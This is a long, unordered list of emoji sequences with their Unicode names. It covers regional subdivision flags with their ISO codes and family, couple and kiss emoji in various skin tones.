👩🏼❤️💋👩🏿 Kiss - Woman: Medium-Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ghanzi (BW-GH)
👨🏻❤️👩🏻 Couple With Heart - Man: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Atlantique (BJ-AQ)
👨🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👨🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Southern (BW-SO)
👨🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾❤️👩 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman
👨👩👶👧 Family: Man, Woman, Baby, Girl
👨🏽❤️💋👨🏾 Kiss - Man: Medium Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Sowa Town (BW-ST)
🏴 Flag for Selibe Phikwe (BW-SP)
👩🏿❤️👩🏾 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩👨👦👦 Family: Woman, Man, Boy, Boy
👩🏿👨🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Minsk (BY-HM)
🏴 Flag for Homel (BY-HO)
👨🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Izmir (TR-35)
🏴 Flag for Hrodna (BY-HR)
🏴 Flag for Magileu (BY-MA)
🏴 Flag for Minsk Region (BY-MI)
👨🏼❤️💋👩🏿 Kiss - Man: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨🏾❤️👩🏻 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Belize (BZ-BZ)
🏴 Flag for Lobatse (BW-LO)
👩👦👧 Family: Woman, Boy, Girl
👨🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Moore’s Island (BS-MI)
🏴 Flag for Mono (BJ-MO)
👨🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Vitebsk (BY-VI)
🏴 Flag for Stann Creek (BZ-SC)
👨🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Corozal (BZ-CZL)
👨🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Toledo (BZ-TOL)
🏴 Flag for Sudur Pashchimanchal (NP-5)
🏴 Flag for Harbour Island (BS-HI)
🏴 Flag for Alberta (CA-AB)
👩🏾❤️👨🏾 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️💋👨🏼 Kiss - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Vientiane Province (LA-VI)
👨👩👦👧 Family: Man, Woman, Boy, Girl
👨🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👨🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Prince Edward Island (CA-PE)
🏴 Flag for Kwango (CD-KG)
🏴 Flag for Nova Scotia (CA-NS)
👨🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Haut-Uélé (CD-HU)
🏴 Flag for Bas-Congo (CD-BC)
🏴 Flag for Sud-Ubangi (CD-SU)
🏴 Flag for Maniema (CD-MA)
🏴 Flag for Sankuru (CD-SA)
🏴 Flag for Tshuapa (CD-TU)
🏴 Flag for Yukon (CA-YT)
🏴 Flag for Mongala (CD-MO)
🏴 Flag for Bamingui-Bangoran (CF-BB)
🏴 Flag for Mai-Ndombe (CD-MN)
🏴 Flag for Nunavut (CA-NU)
🏴 Flag for Kwilu (CD-KL)
🏴 Flag for New Brunswick (CA-NB)
🏴 Flag for Bangui (CF-BGF)
🏴 Flag for Kinshasa (CD-KN)
🏴 Flag for North Kivu (CD-NK)
🏴 Flag for Northwest Territories (CA-NT)
🏴 Flag for Tshopo (CD-TO)
🏴 Flag for Bas-Uélé (CD-BU)
🏴 Flag for Haut-Lomami (CD-HL)
🏴 Flag for Haut-Katanga (CD-HK)
🏴 Flag for Kasaï-Oriental (CD-KE)
🏴 Flag for South Kivu (CD-SK)
🏴 Flag for Ontario (CA-ON)
🏴 Flag for Ouham (CF-AC)
🏴 Flag for Mambéré-Kadéï (CF-HS)
🏴 Flag for Kasaï Central (CD-KC)
🏴 Flag for Nord-Ubangi (CD-NU)
🏴 Flag for Kasaï (CD-KS)
🏴 Flag for Ituri (CD-IT)
🏴 Flag for Bern (CH-BE)
🏴 Flag for Lékoumou (CG-2)
🏴 Flag for Appenzell Innerrhoden (CH-AI)
🏴 Flag for Ombella-M’Poko (CF-MP)
👨🏻👶🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Kémo (CF-KG)
🏴 Flag for Sangha (CG-13)
🏴 Flag for Lucerne (CH-LU)
🏴 Flag for Geneva (CH-GE)
🏴 Flag for Nidwalden (CH-NW)
🏴 Flag for Kouilou (CG-5)
🏴 Flag for Likouala (CG-7)
🏴 Flag for Brazzaville (CG-BZV)
🏴 Flag for Schaffhausen (CH-SH)
🏴 Flag for Lomami (CD-LO)
🏴 Flag for Appenzell Ausserrhoden (CH-AR)
🏴 Flag for Schwyz (CH-SZ)
🏴 Flag for Neuchâtel (CH-NE)
🏴 Flag for Ouham-Pendé (CF-OP)
🏴 Flag for Graubünden (CH-GR)
🏴 Flag for Solothurn (CH-SO)
🏴 Flag for Fribourg (CH-FR)
🏴 Flag for Plateaux (CG-14)
🏴 Flag for Sangha-Mbaéré (CF-SE)
👨🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Aargau (CH-AG)
🏴 Flag for Cuvette-Ouest (CG-15)
🏴 Flag for St. Gallen (CH-SG)
🏴 Flag for Cuvette (CG-8)
🏴 Flag for Obwalden (CH-OW)
🏴 Flag for Basel-Stadt (CH-BS)
🏴 Flag for Lobaye (CF-LB)
🏴 Flag for Valparaíso (CL-VS)
🏴 Flag for Northwest (CM-NW)
🏴 Flag for Denguélé (CI-DN)
🏴 Flag for North (CM-NO)
🏴 Flag for Yamoussoukro (CI-YM)
🏴 Flag for East (CM-ES)
👨🏼👶🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Woroba (CI-WR)
🏴 Flag for Lagunes (CI-LG)
🏴 Flag for Gôh-Djiboua (CI-GD)
🏴 Flag for Comoé (CI-CM)
🏴 Flag for Southwest (CM-SW)
🏴 Flag for Bío Bío (CL-BI)
🏴 Flag for Aysén (CL-AI)
🏴 Flag for Santiago Metropolitan (CL-RM)
🏴 Flag for Tarapacá (CL-TA)
🏴 Flag for South (CM-SU)
🏴 Flag for Atacama (CL-AT)
🏴 Flag for Tianjin (CN-12)
🏴 Flag for Lacs (CI-LC)
🏴 Flag for Coquimbo (CL-CO)
🏴 Flag for Arica y Parinacota (CL-AP)
🏴 Flag for Littoral (CM-LT)
🏴 Flag for Centre (CM-CE)
🏴 Flag for Far North (CM-EN)
🏴 Flag for Magallanes Region (CL-MA)
🏴 Flag for Maule (CL-ML)
🏴 Flag for Montagnes (CI-MG)
🏴 Flag for Bas-Sassandra (CI-BS)
🏴 Flag for Adamawa (CM-AD)
🏴 Flag for Los Ríos (CL-LR)
🏴 Flag for West (CM-OU)
🏴 Flag for Savanes (CI-SV)
🏴 Flag for Los Lagos (CL-LL)
🏴 Flag for Shandong (CN-37)
🏴 Flag for Gansu (CN-62)
🏴 Flag for Shanghai (CN-31)
🏴 Flag for Jiangxi (CN-36)
🏴 Flag for Taiwan (CN-71)
🏴 Flag for Boyacá (CO-BOY)
🏴 Flag for Beijing (CN-11)
🏴 Flag for Ruse (BG-18)
🏴 Flag for Guangdong (CN-44)
🏴 Flag for Qinghai (CN-63)
🏴 Flag for Heilongjiang (CN-23)
🏴 Flag for Sichuan (CN-51)
🏴 Flag for Caldas (CO-CAL)
🏴 Flag for Bolívar (CO-BOL)
🏴 Flag for Yunnan (CN-53)
🏴 Flag for Atlántico (CO-ATL)
🏴 Flag for Hubei (CN-42)
🏴 Flag for Jilin (CN-22)
🏴 Flag for Caquetá (CO-CAQ)
🏴 Flag for Zhejiang (CN-33)
🏴 Flag for Hebei (CN-13)
🏴 Flag for Inner Mongolia (CN-15)
🏴 Flag for Hunan (CN-43)
🏴 Flag for Haute-Kotto (CF-HK)
🏴 Flag for Xinjiang (CN-65)
🏴 Flag for Chongqing (CN-50)
🏴 Flag for Guangxi (CN-45)
🏴 Flag for Tibet (CN-54)
🏴 Flag for Jiangsu (CN-32)
🏴 Flag for Arauca (CO-ARA)
🏴 Flag for Fujian (CN-35)
🏴 Flag for Henan (CN-41)
🏴 Flag for Hainan (CN-46)
🏴 Flag for Shanxi (CN-14)
🏴 Flag for Magdalena (CO-MAG)
🏴 Flag for Chocó (CO-CHO)
🏴 Flag for Guainía (CO-GUA)
🏴 Flag for Córdoba (CO-COR)
🏴 Flag for Putumayo (CO-PUT)
🏴 Flag for Santander (CO-SAN)
🏴 Flag for Villa Clara (CU-05)
🏴 Flag for Valle del Cauca (CO-VAC)
🏴 Flag for Quindío (CO-QUI)
🏴 Flag for Risaralda (CO-RIS)
🏴 Flag for Cundinamarca (CO-CUN)
👨🏽👶🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Alajuela (CR-A)
🏴 Flag for Puntarenas (CR-P)
🏴 Flag for Huila (CO-HUI)
🏴 Flag for Vaupés (CO-VAU)
🏴 Flag for Cauca (CO-CAU)
🏴 Flag for Sancti Spíritus (CU-07)
🏴 Flag for Limón (CR-L)
🏴 Flag for Norte de Santander (CO-NSA)
🏴 Flag for Matanzas (CU-04)
🏴 Flag for Guanacaste (CR-G)
🏴 Flag for Havana (CU-03)
👩🏾❤️💋👨 Kiss - Woman: Medium-Dark Skin Tone, Man
🏴 Flag for Ciego de Ávila (CU-08)
🏴 Flag for Tolima (CO-TOL)
🏴 Flag for Camagüey (CU-09)
🏴 Flag for Cienfuegos (CU-06)
🏴 Flag for Guaviare (CO-GUV)
🏴 Flag for Cayo (BZ-CY)
🏴 Flag for Southern Nations, Nationalities, and Peoples (ET-SN)
🏴 Flag for Pinar del Río (CU-01)
🏴 Flag for San José (CR-SJ)
🏴 Flag for Cartago (CR-C)
🏴 Flag for La Guajira (CO-LAG)
🏴 Flag for Limassol (CY-02)
🏴 Flag for Lower Saxony (DE-NI)
🏴 Flag for Orange Walk (BZ-OW)
🏴 Flag for Kraj Vysočina (CZ-63)
🏴 Flag for Liberecký kraj (CZ-51)
🏴 Flag for Las Tunas (CU-10)
🏴 Flag for Santiago de Cuba (CU-13)
👨🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Nicosia (CY-01)
🏴 Flag for Středočeský kraj (CZ-20)
🏴 Flag for Vakaga (CF-VK)
🏴 Flag for Královéhradecký kraj (CZ-52)
🏴 Flag for Karlovarský kraj (CZ-41)
🏴 Flag for Artemisa (CU-15)
🏴 Flag for Famagusta (CY-04)
🏴 Flag for Bremen (DE-HB)
🏴 Flag for Hesse (DE-HE)
🏴 Flag for Holguín (CU-11)
👨🏿👶🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Moravskoslezský kraj (CZ-80)
🏴 Flag for Jihočeský kraj (CZ-31)
🏴 Flag for Glarus (CH-GL)
🏴 Flag for Praha, Hlavní mešto (CZ-10)
🏴 Flag for Larnaca (CY-03)
🏴 Flag for Hamburg (DE-HH)
🏴 Flag for Mecklenburg-Vorpommern (DE-MV)
🏴 Flag for Barlavento Islands (CV-B)
🏴 Flag for Sotavento Islands (CV-S)
🏴 Flag for Mayabeque (CU-16)
🏴 Flag for Olomoucký kraj (CZ-71)
🏴 Flag for Guantánamo (CU-14)
🏴 Flag for Brandenburg (DE-BB)
🏴 Flag for Plzeňský kraj (CZ-32)
🏴 Flag for Ali Sabieh (DJ-AS)
🏴 Flag for Rhineland-Palatinate (DE-RP)
🏴 Flag for Saxony (DE-SN)
🏴 Flag for Zealand (DK-85)
🏴 Flag for Saxony-Anhalt (DE-ST)
🏴 Flag for Chlef (DZ-02)
🏴 Flag for Saint Luke (DM-07)
🏴 Flag for Arta (DJ-AR)
🏴 Flag for Capital Region (DK-84)
🏴 Flag for Saint Paul (DM-10)
🏴 Flag for Cibao Sur (DO-36)
🏴 Flag for Enriquillo (DO-38)
🏴 Flag for Saint Patrick (DM-09)
🏴 Flag for Cibao Noroeste (DO-34)
🏴 Flag for Cibao Nordeste (DO-33)
🏴 Flag for Saint John (DM-05)
🏴 Flag for Yuma (DO-42)
🏴 Flag for Obock (DJ-OB)
🏴 Flag for Thuringia (DE-TH)
🏴 Flag for Ozama (DO-40)
🏴 Flag for Saarland (DE-SL)
🏴 Flag for Saint George (DM-04)
🏴 Flag for Saint David (DM-03)
🏴 Flag for Saint Andrew (DM-02)
🏴 Flag for Dikhil (DJ-DI)
🏴 Flag for Saint Mark (DM-08)
🏴 Flag for Tadjourah (DJ-TA)
🏴 Flag for Saint Peter (DM-11)
🏴 Flag for Valdesia (DO-41)
🏴 Flag for Higüamo (DO-39)
🏴 Flag for Laghouat (DZ-03)
🏴 Flag for M’Sila (DZ-28)
🏴 Flag for Illizi (DZ-33)
👩🏿👨🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Tizi Ouzou (DZ-15)
🏴 Flag for Tiaret (DZ-14)
🏴 Flag for Sétif (DZ-19)
🏴 Flag for Djelfa (DZ-17)
🏴 Flag for Constantine (DZ-25)
🏴 Flag for Guelma (DZ-24)
🏴 Flag for Tipasa (DZ-42)
🏴 Flag for Batna (DZ-05)
🏴 Flag for Tébessa (DZ-12)
🏴 Flag for Biskra (DZ-07)
🏴 Flag for Ouargla (DZ-30)
🏴 Flag for Sidi Bel Abbès (DZ-22)
🏴 Flag for Tamanghasset (DZ-11)
🏴 Flag for Médéa (DZ-26)
🏴 Flag for El Bayadh (DZ-32)
🏴 Flag for Khenchela (DZ-40)
🏴 Flag for Tissemsilt (DZ-38)
🏴 Flag for El Oued (DZ-39)
🏴 Flag for Souk Ahras (DZ-41)
🏴 Flag for Tlemcen (DZ-13)
🏴 Flag for Béjaïa (DZ-06)
🏴 Flag for Mila (DZ-43)
🏴 Flag for Saïda (DZ-20)
🏴 Flag for Oran (DZ-31)
🏴 Flag for Bouira (DZ-10)
🏴 Flag for Boumerdès (DZ-35)
🏴 Flag for El Tarf (DZ-36)
🏴 Flag for Algiers (DZ-16)
🏴 Flag for Tindouf (DZ-37)
🏴 Flag for Annaba (DZ-23)
🏴 Flag for Blida (DZ-09)
🏴 Flag for Oum El Bouaghi (DZ-04)
🏴 Flag for Mostaganem (DZ-27)
🏴 Flag for Chimborazo (EC-H)
🏴 Flag for Ghardaïa (DZ-47)
🏴 Flag for Bolívar (EC-B)
🏴 Flag for Carchi (EC-C)
🏴 Flag for Aïn Defla (DZ-44)
🏴 Flag for Paphos (CY-05)
🏴 Flag for Relizane (DZ-48)
🏴 Flag for Morona-Santiago (EC-S)
🏴 Flag for Jura (CH-JU)
🏴 Flag for Santa Elena (EC-SE)
🏴 Flag for Lääne (EE-57)
🏴 Flag for Imbabura (EC-I)
🏴 Flag for Aïn Témouchent (DZ-46)
🏴 Flag for Galápagos (EC-W)
🏴 Flag for Napo (EC-N)
👨🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Pärnu (EE-67)
🏴 Flag for Tartu (EE-78)
🏴 Flag for Azuay (EC-A)
🏴 Flag for Manabí (EC-M)
🏴 Flag for El Oro (EC-O)
🏴 Flag for Pichincha (EC-P)
🏴 Flag for Rapla (EE-70)
🏴 Flag for Saare (EE-74)
👨🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Põlva (EE-65)
🏴 Flag for Pastaza (EC-Y)
🏴 Flag for Guayas (EC-G)
🏴 Flag for Los Ríos (EC-R)
🏴 Flag for Sucumbíos (EC-U)
🏴 Flag for Jõgeva (EE-49)
🏴 Flag for Valga (EE-82)
🏴 Flag for Loja (EC-L)
🏴 Flag for Orellana (EC-D)
👨🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Naama (DZ-45)
🏴 Flag for Järva (EE-51)
🏴 Flag for North Sinai (EG-SIN)
🏴 Flag for South Sinai (EG-JS)
🏴 Flag for Qena (EG-KN)
🏴 Flag for Viljandi (EE-84)
🏴 Flag for Ismailia (EG-IS)
🏴 Flag for Aswan (EG-ASN)
🏴 Flag for Dakahlia (EG-DK)
🏴 Flag for Gharbia (EG-GH)
🏴 Flag for Beheira (EG-BH)
🏴 Flag for Võru (EE-86)
🏴 Flag for Asyut (EG-AST)
🏴 Flag for Qalyubia (EG-KB)
🏴 Flag for Giza (EG-GZ)
👨🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Anseba (ER-AN)
🏴 Flag for Kafr el-Sheikh (EG-KFS)
🏴 Flag for Matrouh (EG-MT)
🏴 Flag for Gash-Barka (ER-GB)
🏴 Flag for Minya (EG-MN)
🏴 Flag for Alexandria (EG-ALX)
🏴 Flag for Southern Red Sea (ER-DK)
🏴 Flag for Port Said (EG-PTS)
🏴 Flag for Sohag (EG-SHG)
🏴 Flag for New Valley (EG-WAD)
🏴 Flag for Northern Red Sea (ER-SK)
🏴 Flag for Suez (EG-SUZ)
🏴 Flag for Monufia (EG-MNF)
🏴 Flag for Luxor (EG-LX)
🏴 Flag for Maekel (ER-MA)
🏴 Flag for Damietta (EG-DT)
🏴 Flag for Al Sharqia (EG-SHR)
🏴 Flag for Faiyum (EG-FYM)
🏴 Flag for Debub (ER-DU)
🏴 Flag for Aragon (ES-AR)
🏴 Flag for Anhui (CN-34)
🏴 Flag for Northern Denmark (DK-81)
👨🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Tigray (ET-TI)
🏴 Flag for Liaoning (CN-21)
🏴 Flag for Gambela (ET-GA)
🏴 Flag for Melilla (ES-ML)
🏴 Flag for Murcia Region (ES-MC)
🏴 Flag for Lapland (FI-10)
🏴 Flag for Central Ostrobothnia (FI-07)
🏴 Flag for Amhara (ET-AM)
🏴 Flag for Benishangul-Gumuz (ET-BE)
🏴 Flag for Oromia (ET-OR)
🏴 Flag for La Rioja (ES-RI)
🏴 Flag for Djibouti (DJ-DJ)
🏴 Flag for Madrid Autonomous Community (ES-MD)
🏴 Flag for Dire Dawa (ET-DD)
🏴 Flag for Mascara (DZ-29)
🏴 Flag for Kainuu (FI-05)
🏴 Flag for Kymenlaakso (FI-09)
🏴 Flag for Southern Ostrobothnia (FI-03)
🏴 Flag for Pirkanmaa (FI-11)
🏴 Flag for Southern Savonia (FI-04)
🏴 Flag for North Karelia (FI-13)
🏴 Flag for South Karelia (FI-02)
🏴 Flag for Harari (ET-HA)
🏴 Flag for Zlínský kraj (CZ-72)
🏴 Flag for Somali (ET-SO)
🏴 Flag for Catalonia (ES-CT)
🏴 Flag for Kosrae (FM-KSA)
🏴 Flag for New Caledonia (FR-NC)
🏴 Flag for Occitanie (FR-OCC)
🏴 Flag for Provence-Alpes-Côte-d’Azur (FR-PAC)
🏴 Flag for Northern Savonia (FI-15)
🏴 Flag for Chuuk (FM-TRK)
🏴 Flag for Bourgogne-Franche-Comté (FR-BFC)
🏴 Flag for Northern Ostrobothnia (FI-14)
🏴 Flag for Rotuma (FJ-R)
🏴 Flag for Mayotte (FR-MAY)
🏴 Flag for Nouvelle-Aquitaine (FR-NAQ)
🏴 Flag for Central (FJ-C)
🏴 Flag for Grand-Est (FR-GES)
🏴 Flag for Northern (FJ-N)
🏴 Flag for Guadeloupe (FR-GUA)
🏴 Flag for Yap (FM-YAP)
🏴 Flag for Bretagne (FR-BRE)
🏴 Flag for French Polynesia (FR-PF)
🏴 Flag for Normandie (FR-NOR)
🏴 Flag for French Guiana (FR-GF)
🏴 Flag for Centre-Val de Loire (FR-CVL)
🏴 Flag for Clipperton Island (FR-CP)
🏴 Flag for St. Martin (FR-MF)
🏴 Flag for Päijänne Tavastia (FI-16)
🏴 Flag for Southwest Finland (FI-19)
🏴 Flag for La Réunion (FR-LRE)
🏴 Flag for Satakunta (FI-17)
🏴 Flag for Shida Kartli (GE-SK)
🏴 Flag for Moyen-Ogooué (GA-3)
👨🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Saint George (GD-03)
🏴 Flag for Nyanga (GA-5)
🏴 Flag for Ogooué-Ivindo (GA-6)
🏴 Flag for Brong-Ahafo (GH-BA)
🏴 Flag for Haut-Ogooué (GA-2)
🏴 Flag for Saint Andrew (GD-01)
🏴 Flag for Saint Patrick (GD-06)
🏴 Flag for Galicia (ES-GA)
🏴 Flag for Wallis & Futuna (FR-WF)
👨🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for St. Pierre & Miquelon (FR-PM)
🏴 Flag for Saint John (GD-04)
🏴 Flag for Tbilisi (GE-TB)
👨🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint David (GD-02)
🏴 Flag for Guria (GE-GU)
🏴 Flag for Woleu-Ntem (GA-9)
🏴 Flag for Racha-Lechkhumi and Kvemo Svaneti (GE-RL)
🏴 Flag for Samtskhe-Javakheti (GE-SJ)
🏴 Flag for Mtskheta-Mtianeti (GE-MM)
🏴 Flag for Imereti (GE-IM)
🏴 Flag for Ogooué-Maritime (GA-8)
🏴 Flag for Shaanxi (CN-61)
🏴 Flag for Greater Accra (GH-AA)
🏴 Flag for Jihomoravský kraj (CZ-64)
🏴 Flag for Adjara (GE-AJ)
🏴 Flag for Samegrelo-Zemo Svaneti (GE-SZ)
🏴 Flag for Estuaire (GA-1)
🏴 Flag for Ogooué-Lolo (GA-7)
🏴 Flag for Kindia Region (GN-D)
🏴 Flag for Mamou Region (GN-M)
👨🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Qaasuitsup (GL-QA)
🏴 Flag for North Bank Division (GM-N)
🏴 Flag for Sermersooq (GL-SM)
🏴 Flag for Northern (GH-NP)
🏴 Flag for Ionian Islands (GR-F)
🏴 Flag for Central Greece (GR-H)
🏴 Flag for Central (GH-CP)
🏴 Flag for Kankan Region (GN-K)
🏴 Flag for South Aegean (GR-L)
🏴 Flag for Attica (GR-I)
🏴 Flag for Upper River Division (GM-U)
🏴 Flag for Eastern (GH-EP)
🏴 Flag for Nzérékoré Region (GN-N)
🏴 Flag for Western (GH-WP)
🏴 Flag for West Macedonia (GR-C)
🏴 Flag for Río Muni (GQ-C)
🏴 Flag for Lower River Division (GM-L)
🏴 Flag for Upper East (GH-UE)
🏴 Flag for Conakry (GN-C)
🏴 Flag for Central Macedonia (GR-B)
🏴 Flag for Central River Division (GM-M)
🏴 Flag for Upper West (GH-UW)
🏴 Flag for Kujalleq (GL-KU)
🏴 Flag for Boké Region (GN-B)
🏴 Flag for Qeqqata (GL-QE)
🏴 Flag for Epirus (GR-D)
🏴 Flag for Ashanti (GH-AH)
🏴 Flag for Volta (GH-TV)
🏴 Flag for Mount Athos (GR-69)
🏴 Flag for Insular (GQ-I)
🏴 Flag for West Coast Division (GM-W)
🏴 Flag for Banjul (GM-B)
🏴 Flag for Labé Region (GN-L)
🏴 Flag for Thessaly (GR-E)
🏴 Flag for Faranah Region (GN-F)
🏴 Flag for Cuyuni-Mazaruni (GY-CU)
🏴 Flag for Atlántida (HN-AT)
👨🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Huehuetenango (GT-HU)
🏴 Flag for Alta Verapaz (GT-AV)
🏴 Flag for El Progreso (GT-PR)
🏴 Flag for Norte (GW-N)
🏴 Flag for Suchitepéquez (GT-SU)
🏴 Flag for Pomeroon-Supenaam (GY-PM)
🏴 Flag for Izabal (GT-IZ)
🏴 Flag for Potaro-Siparuni (GY-PT)
🏴 Flag for Quetzaltenango (GT-QZ)
🏴 Flag for Chimaltenango (GT-CM)
🏴 Flag for Addis Ababa (ET-AA)
🏴 Flag for Bissau (GW-BS)
🏴 Flag for Quiché (GT-QC)
🏴 Flag for Totonicapán (GT-TO)
🏴 Flag for Barima-Waini (GY-BA)
🏴 Flag for Essequibo Islands-West Demerara (GY-ES)
👨🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Choluteca (HN-CH)
🏴 Flag for Demerara-Mahaica (GY-DE)
👨🏻👨🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Sacatepéquez (GT-SA)
🏴 Flag for Jutiapa (GT-JU)
🏴 Flag for Chiquimula (GT-CQ)
🏴 Flag for Baja Verapaz (GT-BV)
🏴 Flag for Escuintla (GT-ES)
🏴 Flag for Zacapa (GT-ZA)
🏴 Flag for Sul (GW-S)
🏴 Flag for Leste (GW-L)
🏴 Flag for Jalapa (GT-JA)
🏴 Flag for Petén (GT-PE)
🏴 Flag for Sololá (GT-SO)
🏴 Flag for Comayagua (HN-CM)
🏴 Flag for Koprivnica-Križevci (HR-06)
🏴 Flag for Copán (HN-CP)
🏴 Flag for Bay Islands (HN-IB)
🏴 Flag for Lika-Senj (HR-09)
🏴 Flag for Santa Bárbara (HN-SB)
🏴 Flag for Intibucá (HN-IN)
🏴 Flag for Francisco Morazán (HN-FM)
🏴 Flag for Zagreb County (HR-01)
🏴 Flag for Colón (HN-CL)
🏴 Flag for Centre (HT-CE)
🏴 Flag for Primorje-Gorski Kotar (HR-08)
🏴 Flag for Lempira (HN-LE)
🏴 Flag for Osijek-Baranja (HR-14)
🏴 Flag for Brod-Posavina (HR-12)
🏴 Flag for Split-Dalmatia (HR-17)
🏴 Flag for Olancho (HN-OL)
🏴 Flag for La Paz (HN-LP)
🏴 Flag for Međimurje (HR-20)
🏴 Flag for El Paraíso (HN-EP)
🏴 Flag for Zagreb (HR-21)
🏴 Flag for Šibenik-Knin (HR-15)
🏴 Flag for Ida-Viru (EE-44)
🏴 Flag for Cortés (HN-CR)
🏴 Flag for Sisak-Moslavina (HR-03)
🏴 Flag for Zadar (HR-13)
🏴 Flag for Istria (HR-18)
🏴 Flag for Krapina-Zagorje (HR-02)
🏴 Flag for Vukovar-Syrmia (HR-16)
🏴 Flag for Yoro (HN-YO)
🏴 Flag for Artibonite (HT-AR)
🏴 Flag for Gracias a Dios (HN-GD)
🏴 Flag for Valle (HN-VA)
🏴 Flag for Jijel (DZ-18)
🏴 Flag for Dubrovnik-Neretva (HR-19)
🏴 Flag for Požega-Slavonia (HR-11)
🏴 Flag for Bjelovar-Bilogora (HR-07)
🏴 Flag for Ocotepeque (HN-OC)
🏴 Flag for Budapest (HU-BU)
🏴 Flag for Hódmezővásárhely (HU-HV)
🏴 Flag for Fejér (HU-FE)
🏴 Flag for Baranya (HU-BA)
🏴 Flag for Székesfehérvár (HU-SF)
🏴 Flag for Borsod-Abaúj-Zemplén (HU-BZ)
🏴 Flag for Csongrád (HU-CS)
🏴 Flag for Sopron (HU-SN)
🏴 Flag for Dunaújváros (HU-DU)
🏴 Flag for Kaposvár (HU-KV)
🏴 Flag for Nyíregyháza (HU-NY)
🏴 Flag for Hajdú-Bihar (HU-HB)
🏴 Flag for Ouest (HT-OU)
🏴 Flag for Szeged (HU-SD)
🏴 Flag for Pest (HU-PE)
🏴 Flag for Komárom-Esztergom (HU-KE)
🏴 Flag for Nagykanizsa (HU-NK)
🏴 Flag for Grand’Anse (HT-GA)
🏴 Flag for Békéscsaba (HU-BC)
